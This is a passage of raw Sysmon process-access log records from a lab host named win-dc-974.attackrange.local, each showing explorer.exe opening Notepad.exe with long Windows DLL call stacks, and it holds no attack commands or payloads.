\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.114{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7